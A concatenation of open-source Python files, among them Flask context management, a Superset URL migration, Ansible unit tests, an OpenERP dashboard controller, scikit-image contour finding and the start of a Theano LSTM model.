            def __init__(self, username, remote_addr=None):
                self.username = username
                if remote_addr is None and request:
                    remote_addr = request.remote_addr
                self.remote_addr = remote_addr

    .. versionadded:: 0.7
    """
    # A non-empty request-context stack means we are inside a request.
    return _request_ctx_stack.top is not None
def has_app_context():
    """Works like :func:`has_request_context` but for the application
    context.  You can also just do a boolean check on the
    :data:`current_app` object instead.

    .. versionadded:: 0.9
    """
    return _app_ctx_stack.top is not None
class AppContext(object):
    """The application context binds an application object implicitly
    to the current thread or greenlet, similar to how the
    :class:`RequestContext` binds request information.  The application
    context is also implicitly created if a request context is created
    but the application is not on top of the individual application
    context.
    """

    def __init__(self, app):
        self.app = app
        self.url_adapter = app.create_url_adapter(None)
        self.g = app.app_ctx_globals_class()

        # Like request context, app contexts can be pushed multiple times
        # but there a basic "refcount" is enough to track them.
        self._refcnt = 0

    def push(self):
        """Binds the app context to the current context."""
        self._refcnt += 1
        _app_ctx_stack.push(self)
        appcontext_pushed.send(self.app)

    def pop(self, exc=None):
        """Pops the app context."""
        self._refcnt -= 1
        # Teardown functions only run when the outermost push is popped.
        if self._refcnt <= 0:
            if exc is None:
                exc = sys.exc_info()[1]
            self.app.do_teardown_appcontext(exc)
        rv = _app_ctx_stack.pop()
        assert rv is self, 'Popped wrong app context. (%r instead of %r)' \
            % (rv, self)
        appcontext_popped.send(self.app)

    def __enter__(self):
        self.push()
        return self

    def __exit__(self, exc_type, exc_value, tb):
        self.pop(exc_value)
class RequestContext(object):
    """The request context contains all request relevant information.  It is
    created at the beginning of the request and pushed to the
    `_request_ctx_stack` and removed at the end of it.  It will create the
    URL adapter and request object for the WSGI environment provided.

    Do not attempt to use this class directly, instead use
    :meth:`~flask.Flask.test_request_context` and
    :meth:`~flask.Flask.request_context` to create this object.

    When the request context is popped, it will evaluate all the
    functions registered on the application for teardown execution
    (:meth:`~flask.Flask.teardown_request`).

    The request context is automatically popped at the end of the request
    for you.  In debug mode the request context is kept around if
    exceptions happen so that interactive debuggers have a chance to
    introspect the data.  With 0.4 this can also be forced for requests
    that did not fail and outside of `DEBUG` mode.  By setting
    ``'flask._preserve_context'`` to `True` on the WSGI environment the
    context will not pop itself at the end of the request.  This is used by
    the :meth:`~flask.Flask.test_client` for example to implement the
    deferred cleanup functionality.

    You might find this helpful for unittests where you need the
    information from the context local around for a little longer.  Make
    sure to properly :meth:`~werkzeug.LocalStack.pop` the stack yourself in
    that situation, otherwise your unittests will leak memory.
    """

    def __init__(self, app, environ, request=None):
        self.app = app
        if request is None:
            request = app.request_class(environ)
        self.request = request
        self.url_adapter = app.create_url_adapter(self.request)
        self.flashes = None
        self.session = None

        # Request contexts can be pushed multiple times and interleaved with
        # other request contexts.  Now only if the last level is popped we
        # get rid of them.  Additionally if an application context is missing
        # one is created implicitly so for each level we add this information
        self._implicit_app_ctx_stack = []

        # indicator if the context was preserved.  Next time another context
        # is pushed the preserved context is popped.
        self.preserved = False

        # remembers the exception for pop if there is one in case the context
        # preservation kicks in.
        self._preserved_exc = None

        # Functions that should be executed after the request on the response
        # object.  These will be called before the regular "after_request"
        # functions.
        self._after_request_functions = []

        # Resolve the URL rule eagerly so view_args are available immediately.
        self.match_request()

        # XXX: Support for deprecated functionality.  This is going away with
        # Flask 1.0
        blueprint = self.request.blueprint
        if blueprint is not None:
            # better safe than sorry, we don't want to break code that
            # already worked
            bp = app.blueprints.get(blueprint)
            if bp is not None and blueprint_is_module(bp):
                self.request._is_old_module = True

    # `g` is proxied to the application context's globals so that
    # request-level code and app-level code share the same namespace.
    def _get_g(self):
        return _app_ctx_stack.top.g
    def _set_g(self, value):
        _app_ctx_stack.top.g = value
    g = property(_get_g, _set_g)
    del _get_g, _set_g

    def copy(self):
        """Creates a copy of this request context with the same request object.
        This can be used to move a request context to a different greenlet.
        Because the actual request object is the same this cannot be used to
        move a request context to a different thread unless access to the
        request object is locked.

        .. versionadded:: 0.10
        """
        return self.__class__(self.app,
            environ=self.request.environ,
            request=self.request
        )

    def match_request(self):
        """Can be overridden by a subclass to hook into the matching
        of the request.
        """
        try:
            url_rule, self.request.view_args = \
                self.url_adapter.match(return_rule=True)
            self.request.url_rule = url_rule
        except HTTPException as e:
            # Routing failures (404, 405, ...) are stored and raised later
            # during dispatch rather than here.
            self.request.routing_exception = e

    def push(self):
        """Binds the request context to the current context."""
        # If an exception occurs in debug mode or if context preservation is
        # activated under exception situations exactly one context stays
        # on the stack.  The rationale is that you want to access that
        # information under debug situations.  However if someone forgets to
        # pop that context again we want to make sure that on the next push
        # it's invalidated, otherwise we run at risk that something leaks
        # memory.  This is usually only a problem in testsuite since this
        # functionality is not active in production environments.
        top = _request_ctx_stack.top
        if top is not None and top.preserved:
            top.pop(top._preserved_exc)

        # Before we push the request context we have to ensure that there
        # is an application context.
        app_ctx = _app_ctx_stack.top
        if app_ctx is None or app_ctx.app != self.app:
            app_ctx = self.app.app_context()
            app_ctx.push()
            self._implicit_app_ctx_stack.append(app_ctx)
        else:
            self._implicit_app_ctx_stack.append(None)

        _request_ctx_stack.push(self)

        # Open the session at the moment that the request context is
        # available.  This allows a custom open_session method to use the
        # request context (e.g. code that access database information
        # stored on `g` instead of the appcontext).
        self.session = self.app.open_session(self.request)
        if self.session is None:
            self.session = self.app.make_null_session()

    def pop(self, exc=None):
        """Pops the request context and unbinds it by doing that.  This will
        also trigger the execution of functions registered by the
        :meth:`~flask.Flask.teardown_request` decorator.

        .. versionchanged:: 0.9
           Added the `exc` argument.
        """
        app_ctx = self._implicit_app_ctx_stack.pop()

        clear_request = False
        # Teardown only runs when the outermost (last) level is popped.
        if not self._implicit_app_ctx_stack:
            self.preserved = False
            self._preserved_exc = None
            if exc is None:
                exc = sys.exc_info()[1]
            self.app.do_teardown_request(exc)

            # If this interpreter supports clearing the exception information
            # we do that now.  This will only go into effect on Python 2.x,
            # on 3.x it disappears automatically at the end of the exception
            # stack.
            if hasattr(sys, 'exc_clear'):
                sys.exc_clear()

            request_close = getattr(self.request, 'close', None)
            if request_close is not None:
                request_close()
            clear_request = True

        rv = _request_ctx_stack.pop()
        assert rv is self, 'Popped wrong request context. (%r instead of %r)' \
            % (rv, self)

        # get rid of circular dependencies at the end of the request
        # so that we don't require the GC to be active.
        if clear_request:
            rv.request.environ['werkzeug.request'] = None

        # Get rid of the app as well if necessary.
        if app_ctx is not None:
            app_ctx.pop(exc)

    def auto_pop(self, exc):
        # Keep the context alive (instead of popping) when the test client
        # asked for preservation or debug-mode exception preservation applies.
        if self.request.environ.get('flask._preserve_context') or \
           (exc is not None and self.app.preserve_context_on_exception):
            self.preserved = True
            self._preserved_exc = exc
        else:
            self.pop(exc)

    def __enter__(self):
        self.push()
        return self

    def __exit__(self, exc_type, exc_value, tb):
        # do not pop the request stack if we are in debug mode and an
        # exception happened.  This will allow the debugger to still
        # access the request object in the interactive shell.  Furthermore
        # the context can be force kept alive for the test client.
        # See flask.testing for how this works.
        self.auto_pop(exc_value)

    def __repr__(self):
        return '<%s \'%s\' [%s] of %s>' % (
            self.__class__.__name__,
            self.request.url,
            self.request.method,
            self.app.name,
        )
| apache-2.0 |
asdf2014/superset | superset/migrations/versions/a99f2f7c195a_rewriting_url_from_shortner_with_new_.py | 9 | 1825 | """rewriting url from shortner with new format
Revision ID: a99f2f7c195a
Revises: db0c65b146bd
Create Date: 2017-02-08 14:16:34.948793
"""
# revision identifiers, used by Alembic.
revision = 'a99f2f7c195a'
down_revision = 'db0c65b146bd'
from alembic import op
import json
import sqlalchemy as sa
from superset import db
from superset.legacy import cast_form_data
from sqlalchemy.ext.declarative import declarative_base
from future.standard_library import install_aliases
install_aliases()
from urllib import parse
Base = declarative_base()
def parse_querystring(qs):
    """Parse a query string into a dict, collecting repeated keys.

    Unlike ``dict(parse.parse_qsl(qs))`` (which keeps only the last
    value), a key seen once maps to its scalar value, while a key seen
    several times maps to a list of its values in order of appearance.

    :param qs: the raw query string (without the leading ``?``)
    :returns: dict mapping each key to a string or a list of strings
    """
    d = {}
    for k, v in parse.parse_qsl(qs):
        if k not in d:
            # First occurrence: store the scalar value.
            d[k] = v
        elif isinstance(d[k], list):
            # Third or later occurrence: extend the existing list.
            d[k].append(v)
        else:
            # Second occurrence: promote the scalar to a list.
            d[k] = [d[k], v]
    return d
class Url(Base):
    """Used for the short url feature"""
    __tablename__ = 'url'
    # Surrogate primary key.
    id = sa.Column(sa.Integer, primary_key=True)
    # Full target URL of the short link; this migration rewrites it into
    # the new ``?form_data=`` format.
    url = sa.Column(sa.Text)
def upgrade():
    """Rewrite stored short URLs into the new ``?form_data=`` format."""
    bind = op.get_bind()
    session = db.Session(bind=bind)
    urls = session.query(Url).all()
    urls_len = len(urls)
    for i, url in enumerate(urls):
        # Only rewrite old-style explore URLs that have a query string and
        # were not already migrated (no ``form_data``/``dbid`` params yet).
        if (
                '?form_data' not in url.url and
                '?' in url.url and
                'dbid' not in url.url and
                url.url.startswith('//superset/explore')):
            d = parse_querystring(url.url.split('?')[1])
            split = url.url.split('/')
            # NOTE(review): assumes the old path layout
            # //superset/explore/<datasource_type>/<datasource_id>/...
            # (segments 4 and 5) -- verify against the legacy URL scheme.
            d['datasource'] = split[5] + '__' + split[4]
            d = cast_form_data(d)
            newurl = '/'.join(split[:-1]) + '/?form_data=' + parse.quote_plus(json.dumps(d))
            url.url = newurl
            session.merge(url)
            session.commit()
            # Progress counter is zero-based, so the last line prints
            # (urls_len - 1)/urls_len.
            print('Updating url ({}/{})'.format(i, urls_len))
    session.close()
def downgrade():
    # Deliberate no-op: the original short-URL format is not recoverable
    # once the rows have been rewritten, so this migration is irreversible.
    pass
| apache-2.0 |
axilleas/ansible | v1/tests/TestPlayVarsFiles.py | 95 | 12363 | #!/usr/bin/env python
import os
import shutil
from tempfile import mkstemp
from tempfile import mkdtemp
from ansible.playbook.play import Play
import ansible
import unittest
from nose.plugins.skip import SkipTest
class FakeCallBacks(object):
    """No-op callback sink satisfying the interface Play expects."""

    def __init__(self):
        """Nothing to initialize."""

    def on_vars_prompt(self):
        """Ignore variable prompts."""

    def on_import_for_host(self, host, filename):
        """Ignore per-host vars-file import notifications."""
class FakeInventory(object):
    """In-memory stand-in for an ansible inventory."""

    def __init__(self):
        # host name -> dict of host variables
        self.hosts = {}

    def basedir(self):
        """Pretend the inventory lives in the current directory."""
        return "."

    def src(self):
        """Name reported as the inventory source."""
        return "fakeinventory"

    def get_variables(self, host, vault_password=None):
        """Return the stored variables for *host*, or an empty dict."""
        if host not in self.hosts:
            return {}
        return self.hosts[host]
class FakePlayBook(object):
    """Attribute-bag stand-in for a playbook.

    Play only reads these attributes; none of their values matter to the
    tests except the caches, the fake inventory/callbacks, and the
    pre-seeded 'localhost' entry in VARS_CACHE.
    """

    def __init__(self):
        self.extra_vars = {}
        # Attributes Play expects to exist but whose values are irrelevant.
        for attr in ('remote_user', 'remote_port',
                     'sudo', 'sudo_user',
                     'su', 'su_user',
                     'become', 'become_method', 'become_user',
                     'transport', 'only_tags', 'skip_tags',
                     'force_handlers'):
            setattr(self, attr, None)
        self.VARS_CACHE = {}
        self.SETUP_CACHE = {}
        self.inventory = FakeInventory()
        self.callbacks = FakeCallBacks()
        self.VARS_CACHE['localhost'] = {}
class TestMe(unittest.TestCase):
    """Tests for how ``Play`` loads, templates and caches ``vars_files``.

    Uses the fake playbook/inventory/callback stubs defined above so that
    only the Play class itself is exercised.
    """

    ########################################
    # BASIC FILE LOADING BEHAVIOR TESTS
    ########################################

    def test_play_constructor(self):
        """A Play can be built from a minimal datastructure."""
        # __init__(self, playbook, ds, basedir, vault_password=None)
        playbook = FakePlayBook()
        ds = { "hosts": "localhost"}
        basedir = "."
        play = Play(playbook, ds, basedir)

    def test_vars_file(self):
        """A single vars_file is loaded into play.vars_file_vars."""

        # make a vars file
        fd, temp_path = mkstemp()
        f = open(temp_path, "wb")
        f.write("foo: bar\n")
        f.close()

        # create a play with a vars_file
        playbook = FakePlayBook()
        ds = { "hosts": "localhost",
               "vars_files": [temp_path]}
        basedir = "."
        play = Play(playbook, ds, basedir)
        os.remove(temp_path)

        # make sure the variable was loaded
        assert 'foo' in play.vars_file_vars, "vars_file was not loaded into play.vars_file_vars"
        assert play.vars_file_vars['foo'] == 'bar', "foo was not set to bar in play.vars_file_vars"

    def test_vars_file_nonlist_error(self):
        """Passing a bare string for vars_files raises an error."""

        # make a vars file
        fd, temp_path = mkstemp()
        f = open(temp_path, "wb")
        f.write("foo: bar\n")
        f.close()

        # create a play with a string for vars_files
        playbook = FakePlayBook()
        ds = { "hosts": "localhost",
               "vars_files": temp_path}
        basedir = "."
        error_hit = False
        try:
            play = Play(playbook, ds, basedir)
        except Exception:  # narrowed from a bare except; any failure counts
            error_hit = True
        os.remove(temp_path)

        assert error_hit == True, "no error was thrown when vars_files was not a list"

    def test_multiple_vars_files(self):
        """All files in a flat vars_files list are loaded."""

        # make a vars file
        fd, temp_path = mkstemp()
        f = open(temp_path, "wb")
        f.write("foo: bar\n")
        f.close()

        # make a second vars file
        fd, temp_path2 = mkstemp()
        f = open(temp_path2, "wb")
        f.write("baz: bang\n")
        f.close()

        # create a play with two vars_files
        playbook = FakePlayBook()
        ds = { "hosts": "localhost",
               "vars_files": [temp_path, temp_path2]}
        basedir = "."
        play = Play(playbook, ds, basedir)
        os.remove(temp_path)
        os.remove(temp_path2)

        # make sure the variables were loaded
        assert 'foo' in play.vars_file_vars, "vars_file was not loaded into play.vars_file_vars"
        assert play.vars_file_vars['foo'] == 'bar', "foo was not set to bar in play.vars_file_vars"
        assert 'baz' in play.vars_file_vars, "vars_file2 was not loaded into play.vars_file_vars"
        assert play.vars_file_vars['baz'] == 'bang', "baz was not set to bang in play.vars_file_vars"

    def test_vars_files_first_found(self):
        """A nested list loads the first file that actually exists."""

        # make a vars file
        fd, temp_path = mkstemp()
        f = open(temp_path, "wb")
        f.write("foo: bar\n")
        f.close()

        # get a random file path
        fd, temp_path2 = mkstemp()
        # make sure this file doesn't exist
        os.remove(temp_path2)

        # create a play
        playbook = FakePlayBook()
        ds = { "hosts": "localhost",
               "vars_files": [[temp_path2, temp_path]]}
        basedir = "."
        play = Play(playbook, ds, basedir)
        os.remove(temp_path)

        # make sure the variable was loaded
        assert 'foo' in play.vars_file_vars, "vars_file was not loaded into play.vars_file_vars"
        assert play.vars_file_vars['foo'] == 'bar', "foo was not set to bar in play.vars_file_vars"

    def test_vars_files_multiple_found(self):
        """A nested list stops at the first existing file."""

        # make a vars file
        fd, temp_path = mkstemp()
        f = open(temp_path, "wb")
        f.write("foo: bar\n")
        f.close()

        # make a second vars file
        fd, temp_path2 = mkstemp()
        f = open(temp_path2, "wb")
        f.write("baz: bang\n")
        f.close()

        # create a play
        playbook = FakePlayBook()
        ds = { "hosts": "localhost",
               "vars_files": [[temp_path, temp_path2]]}
        basedir = "."
        play = Play(playbook, ds, basedir)
        os.remove(temp_path)
        os.remove(temp_path2)

        # make sure the variables were loaded
        assert 'foo' in play.vars_file_vars, "vars_file was not loaded into play.vars_file_vars"
        assert play.vars_file_vars['foo'] == 'bar', "foo was not set to bar in play.vars_file_vars"
        assert 'baz' not in play.vars_file_vars, "vars_file2 was loaded after vars_file1 was loaded"

    def test_vars_files_assert_all_found(self):
        """A missing file in a flat vars_files list is an AnsibleError."""

        # make a vars file
        fd, temp_path = mkstemp()
        f = open(temp_path, "wb")
        f.write("foo: bar\n")
        f.close()

        # make a second vars file
        fd, temp_path2 = mkstemp()
        # make sure it doesn't exist
        os.remove(temp_path2)

        # create a play
        playbook = FakePlayBook()
        ds = { "hosts": "localhost",
               "vars_files": [temp_path, temp_path2]}
        basedir = "."
        error_hit = False
        error_msg = None
        try:
            play = Play(playbook, ds, basedir)
        except ansible.errors.AnsibleError as e:  # `except X, e:` is py2-only syntax
            error_hit = True
            error_msg = e
        os.remove(temp_path)
        assert error_hit == True, "no error was thrown for missing vars_file"

    ########################################
    # VARIABLE PRECEDENCE TESTS
    ########################################

    # On the first run vars_files are loaded into play.vars_file_vars by host == None
    #   * only files with vars from host==None will work here
    # On the secondary run(s), a host is given and the vars_files are loaded into VARS_CACHE
    #   * this only occurs if host is not None, filename2 has vars in the name, and filename3 does not

    # filename  -- the original string
    # filename2 -- filename templated with play vars
    # filename3 -- filename2 template with inject (hostvars + setup_cache + vars_cache)
    # filename4 -- path_dwim(filename3)

    def test_vars_files_for_host(self):
        """Host-scoped templated vars_files land in VARS_CACHE, not play vars."""

        # host != None
        # vars in filename2
        # no vars in filename3

        # make a vars file
        fd, temp_path = mkstemp()
        f = open(temp_path, "wb")
        f.write("foo: bar\n")
        f.close()

        # build play attributes
        playbook = FakePlayBook()
        ds = { "hosts": "localhost",
               "vars_files": ["{{ temp_path }}"]}
        basedir = "."
        playbook.VARS_CACHE['localhost']['temp_path'] = temp_path

        # create play and do first run
        play = Play(playbook, ds, basedir)

        # the second run is started by calling update_vars_files
        play.update_vars_files(['localhost'])
        os.remove(temp_path)

        assert 'foo' in play.playbook.VARS_CACHE['localhost'], "vars_file vars were not loaded into vars_cache"
        assert play.playbook.VARS_CACHE['localhost']['foo'] == 'bar', "foo does not equal bar"

    ########################################
    # COMPLEX FILENAME TEMPLATING TESTS
    ########################################

    def test_vars_files_two_vars_in_name(self):
        """Two play vars can be combined to template one filename."""

        # self.vars_file_vars = ds['vars']
        # self.vars_file_vars += _get_vars() ... aka extra_vars

        # make a temp dir
        temp_dir = mkdtemp()

        # make a temp file
        fd, temp_file = mkstemp(dir=temp_dir)
        f = open(temp_file, "wb")
        f.write("foo: bar\n")
        f.close()

        # build play attributes
        playbook = FakePlayBook()
        ds = { "hosts": "localhost",
               "vars": { "temp_dir": os.path.dirname(temp_file),
                         "temp_file": os.path.basename(temp_file) },
               "vars_files": ["{{ temp_dir + '/' + temp_file }}"]}
        basedir = "."

        # create play and do first run
        play = Play(playbook, ds, basedir)

        # cleanup
        shutil.rmtree(temp_dir)

        assert 'foo' in play.vars_file_vars, "double var templated vars_files filename not loaded"

    def test_vars_files_two_vars_different_scope(self):
        """Mixing a play var and an inventory var scopes the result per host."""
        #
        # Use a play var and an inventory var to create the filename
        #
        # self.playbook.inventory.get_variables(host)
        #   {'group_names': ['ungrouped'], 'inventory_hostname': 'localhost',
        #   'ansible_ssh_user': 'root', 'inventory_hostname_short': 'localhost'}

        # make a temp dir
        temp_dir = mkdtemp()

        # make a temp file
        fd, temp_file = mkstemp(dir=temp_dir)
        f = open(temp_file, "wb")
        f.write("foo: bar\n")
        f.close()

        # build play attributes
        playbook = FakePlayBook()
        playbook.inventory.hosts['localhost'] = {'inventory_hostname': os.path.basename(temp_file)}
        ds = { "hosts": "localhost",
               "vars": { "temp_dir": os.path.dirname(temp_file)},
               "vars_files": ["{{ temp_dir + '/' + inventory_hostname }}"]}
        basedir = "."

        # create play and do first run
        play = Play(playbook, ds, basedir)

        # do the host run
        play.update_vars_files(['localhost'])

        # cleanup
        shutil.rmtree(temp_dir)

        assert 'foo' not in play.vars_file_vars, \
            "mixed scope vars_file loaded into play vars"
        assert 'foo' in play.playbook.VARS_CACHE['localhost'], \
            "differently scoped templated vars_files filename not loaded"
        assert play.playbook.VARS_CACHE['localhost']['foo'] == 'bar', \
            "foo is not bar"

    def test_vars_files_two_vars_different_scope_first_found(self):
        """Same as above, but via the first-found (nested list) form."""
        #
        # Use a play var and an inventory var to create the filename
        #

        # make a temp dir
        temp_dir = mkdtemp()

        # make a temp file
        fd, temp_file = mkstemp(dir=temp_dir)
        f = open(temp_file, "wb")
        f.write("foo: bar\n")
        f.close()

        # build play attributes
        playbook = FakePlayBook()
        playbook.inventory.hosts['localhost'] = {'inventory_hostname': os.path.basename(temp_file)}
        ds = { "hosts": "localhost",
               "vars": { "temp_dir": os.path.dirname(temp_file)},
               "vars_files": [["{{ temp_dir + '/' + inventory_hostname }}"]]}
        basedir = "."

        # create play and do first run
        play = Play(playbook, ds, basedir)

        # do the host run
        play.update_vars_files(['localhost'])

        # cleanup
        shutil.rmtree(temp_dir)

        assert 'foo' not in play.vars_file_vars, \
            "mixed scope vars_file loaded into play vars"
        assert 'foo' in play.playbook.VARS_CACHE['localhost'], \
            "differently scoped templated vars_files filename not loaded"
        assert play.playbook.VARS_CACHE['localhost']['foo'] == 'bar', \
            "foo is not bar"
| gpl-3.0 |
kirca/OpenUpgrade | addons/board/controllers.py | 348 | 1970 | # -*- coding: utf-8 -*-
from xml.etree import ElementTree
from openerp.addons.web.controllers.main import load_actions_from_ir_values
from openerp.http import Controller, route, request
class Board(Controller):
    """HTTP controller backing the dashboard "add to dashboard" feature."""

    @route('/board/add_to_dashboard', type='json', auth='user')
    def add_to_dashboard(self, menu_id, action_id, context_to_save, domain, view_mode, name=''):
        # FIXME move this method to board.board model
        # Resolve the action behind the given menu entry; a falsy result
        # means this menu does not open an editable dashboard.
        dashboard_action = load_actions_from_ir_values('action', 'tree_but_open',
                                                       [('ir.ui.menu', menu_id)], False)
        if dashboard_action:
            action = dashboard_action[0][2]
            if action['res_model'] == 'board.board' and action['views'][0][1] == 'form':
                # Maybe should check the content instead of model board.board ?
                view_id = action['views'][0][0]
                board = request.session.model(action['res_model']).fields_view_get(view_id, 'form')
                if board and 'arch' in board:
                    # Insert a new <action> node at the top of the first
                    # column of the dashboard's XML arch.
                    xml = ElementTree.fromstring(board['arch'])
                    column = xml.find('./board/column')
                    if column is not None:
                        new_action = ElementTree.Element('action', {
                            'name': str(action_id),
                            'string': name,
                            'view_mode': view_mode,
                            'context': str(context_to_save),
                            'domain': str(domain)
                        })
                        column.insert(0, new_action)
                        arch = ElementTree.tostring(xml, 'utf-8')
                        # Persist the modified arch as a per-user customized
                        # view rather than changing the shared board view.
                        return request.session.model('ir.ui.view.custom').create({
                            'user_id': request.session.uid,
                            'ref_id': view_id,
                            'arch': arch
                        }, request.context)
        # Anything short of a successful customization reports failure.
        return False
| agpl-3.0 |
daenamkim/ansible | test/units/parsing/test_unquote.py | 298 | 1602 | # coding: utf-8
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.parsing.quoting import unquote
import pytest
# (quoted input, expected unquoted output) pairs for test_unquote below.
# Every escape byte here is a deliberate test vector -- do not "clean up"
# the literal spellings.
UNQUOTE_DATA = (
    (u'1', u'1'),
    (u'\'1\'', u'1'),
    (u'"1"', u'1'),
    (u'"1 \'2\'"', u'1 \'2\''),
    (u'\'1 "2"\'', u'1 "2"'),
    (u'\'1 \'2\'\'', u'1 \'2\''),
    # Trailing backslash keeps the outer quotes from being stripped.
    (u'"1\\"', u'"1\\"'),
    (u'\'1\\\'', u'\'1\\\''),
    (u'"1 \\"2\\" 3"', u'1 \\"2\\" 3'),
    (u'\'1 \\\'2\\\' 3\'', u'1 \\\'2\\\' 3'),
    # A lone quote character is returned unchanged.
    (u'"', u'"'),
    (u'\'', u'\''),
    # Not entirely sure these are good but they match the current
    # behaviour
    (u'"1""2"', u'1""2'),
    (u'\'1\'\'2\'', u'1\'\'2'),
    (u'"1" 2 "3"', u'1" 2 "3'),
    (u'"1"\'2\'"3"', u'1"\'2\'"3'),
)
@pytest.mark.parametrize("quoted, expected", UNQUOTE_DATA)
def test_unquote(quoted, expected):
    """One pytest case per (input, expected) row in UNQUOTE_DATA."""
    result = unquote(quoted)
    assert result == expected
| gpl-3.0 |
youprofit/scikit-image | skimage/measure/_find_contours.py | 38 | 9217 | import numpy as np
from . import _find_contours_cy
from collections import deque
_param_options = ('high', 'low')
def find_contours(array, level,
                  fully_connected='low', positive_orientation='low'):
    """Find iso-valued contours in a 2D array for a given level value.

    Uses the "marching squares" method to compute the iso-valued contours
    of the input 2D array for a particular level value. Array values are
    linearly interpolated for sub-pixel precision of the output contours.

    Parameters
    ----------
    array : 2D ndarray of double
        Input data in which to find contours.
    level : float
        Value along which to find contours in the array.
    fully_connected : str, {'low', 'high'}
        Whether array elements below the given level are considered
        fully-connected (diagonally adjacent elements joined across the
        ambiguous saddle case) -- in which case elements above the level
        are only face-connected -- or vice-versa.
    positive_orientation : str, {'low', 'high'}
        If 'low', contours wind counter-clockwise around islands of
        low-valued elements (low values always on the left of the
        contour); if 'high', around islands of high-valued elements.

    Returns
    -------
    contours : list of (n, 2)-ndarrays
        Each contour is an ndarray of ``(row, column)`` coordinates along
        the contour. Contours intersecting the array edge are left open;
        all others are closed (first point equals last point). Contours
        are ordered by the position of their smallest lexicographic
        ``x, y`` coordinate.

    Notes
    -----
    Coordinates/values refer to the *center* of array elements, so choose
    a level midway between the expected "light" and "dark" values;
    contours at the exact low or high value of a binarized array are
    often degenerate.

    References
    ----------
    .. [1] Lorensen, William and Harvey E. Cline. Marching Cubes: A High
           Resolution 3D Surface Construction Algorithm. Computer Graphics
           (SIGGRAPH 87 Proceedings) 21(4) July 1987, p. 163-170).

    Examples
    --------
    >>> a = np.zeros((3, 3))
    >>> a[0, 0] = 1
    >>> find_contours(a, 0.5)
    [array([[ 0. ,  0.5],
           [ 0.5,  0. ]])]
    """
    data = np.asarray(array, dtype=np.double)
    if data.ndim != 2:
        raise ValueError('Only 2D arrays are supported.')
    level = float(level)
    bad_params = (fully_connected not in _param_options or
                  positive_orientation not in _param_options)
    if bad_params:
        raise ValueError('Parameters "fully_connected" and'
                         ' "positive_orientation" must be either "high" or "low".')
    # The Cython core emits an unordered stream of segment endpoints;
    # _take_2 pairs them up and _assemble_contours joins them into paths.
    segments = _find_contours_cy.iterate_and_store(data, level,
                                                   fully_connected == 'high')
    contours = _assemble_contours(_take_2(segments))
    if positive_orientation == 'high':
        return [c[::-1] for c in contours]
    return contours
def _take_2(seq):
iterator = iter(seq)
while(True):
n1 = next(iterator)
n2 = next(iterator)
yield (n1, n2)
def _assemble_contours(points_iterator):
    """Join (from_point, to_point) segment pairs into ordered contours.

    Maintains three dicts for O(1) joining as segments stream in:
    ``contours`` maps creation index -> deque of points, while ``starts``
    and ``ends`` map a contour's current first/last point back to
    ``(deque, creation index)`` so adjacent segments can be attached at
    either end.
    """
    current_index = 0
    contours = {}
    starts = {}
    ends = {}
    for from_point, to_point in points_iterator:
        # Ignore degenerate segments.
        # This happens when (and only when) one vertex of the square is
        # exactly the contour level, and the rest are above or below.
        # This degenerate vertex will be picked up later by neighboring squares.
        if from_point == to_point:
            continue
        # A contour starting at to_point can be prepended with this segment;
        # one ending at from_point can be extended by it.
        tail_data = starts.get(to_point)
        head_data = ends.get(from_point)
        if tail_data is not None and head_data is not None:
            tail, tail_num = tail_data
            head, head_num = head_data
            # We need to connect these two contours.
            if tail is head:
                # We need to close a contour.
                # Add the end point, and remove the contour from the
                # 'starts' and 'ends' dicts.
                head.append(to_point)
                del starts[to_point]
                del ends[from_point]
            else:  # tail is not head
                # We need to join two distinct contours.
                # We want to keep the first contour segment created, so that
                # the final contours are ordered left->right, top->bottom.
                if tail_num > head_num:
                    # tail was created second. Append tail to head.
                    head.extend(tail)
                    # remove all traces of tail:
                    del starts[to_point]
                    try:
                        del ends[tail[-1]]
                    except KeyError:
                        pass
                    del contours[tail_num]
                    # remove the old end of head and add the new end.
                    del ends[from_point]
                    ends[head[-1]] = (head, head_num)
                else:  # tail_num <= head_num
                    # head was created second. Prepend head to tail.
                    tail.extendleft(reversed(head))
                    # remove all traces of head:
                    del starts[head[0]]
                    del ends[from_point]
                    del contours[head_num]
                    # remove the old start of tail and add the new start.
                    del starts[to_point]
                    starts[tail[0]] = (tail, tail_num)
        elif tail_data is None and head_data is None:
            # we need to add a new contour
            current_index += 1
            new_num = current_index
            new_contour = deque((from_point, to_point))
            contours[new_num] = new_contour
            starts[from_point] = (new_contour, new_num)
            ends[to_point] = (new_contour, new_num)
        elif tail_data is not None and head_data is None:
            tail, tail_num = tail_data
            # We've found a single contour to which the new segment should be
            # prepended.
            tail.appendleft(from_point)
            del starts[to_point]
            starts[from_point] = (tail, tail_num)
        elif tail_data is None and head_data is not None:
            head, head_num = head_data
            # We've found a single contour to which the new segment should be
            # appended
            head.append(to_point)
            del ends[from_point]
            ends[to_point] = (head, head_num)
    # end iteration over from_ and to_ points
    # Sorting by creation index yields left->right, top->bottom ordering.
    return [np.array(contour) for (num, contour) in sorted(contours.items())]
| bsd-3-clause |
bittlingmayer/Theano-Lights | models/lm_lstm_bn.py | 11 | 5709 | import theano
import theano.tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.tensor.nnet.conv import conv2d
from theano.tensor.signal.downsample import max_pool_2d
from theano.tensor.shared_randomstreams import RandomStreams
import numpy as np
from toolbox import *
from modelbase import *
class LM_lstm_bn(ModelLMBase):
    """Two-layer LSTM language model with batch normalization applied to
    the first layer's gate pre-activations."""

    def save(self):
        # NOTE(review): Windows-style path separator; non-portable as-is.
        if not os.path.exists('savedmodels\\'):
            os.makedirs('savedmodels\\')
        self.params.save(self.filename)
        self.shared_vars.save(self.filename + '_vars')

    def __init__(self, data, hp):
        """Build the training and test computation graphs.

        :param data: dataset description; must provide ``n_tokens``
        :param hp: hyper-parameters (batch_size, seq_size, warmup_size,
                   init_scale, load_model, ...)
        """
        super(LM_lstm_bn, self).__init__(self.__class__.__name__, data, hp)
        self.n_h = 1024      # hidden units per LSTM layer
        self.dropout = 0.5   # dropout probability used during training
